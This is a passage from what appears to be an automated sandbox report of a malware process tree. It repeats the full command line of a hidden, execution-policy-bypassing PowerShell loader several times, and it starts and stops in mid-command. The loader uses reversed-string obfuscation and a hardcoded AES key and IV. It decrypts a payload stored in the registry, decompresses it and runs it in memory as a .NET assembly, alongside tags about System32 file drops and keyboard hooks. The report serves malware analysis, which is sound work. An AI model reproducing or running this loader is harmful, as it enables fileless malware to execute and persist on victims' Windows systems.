$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:9144
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:1528
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:8964
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:6016
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 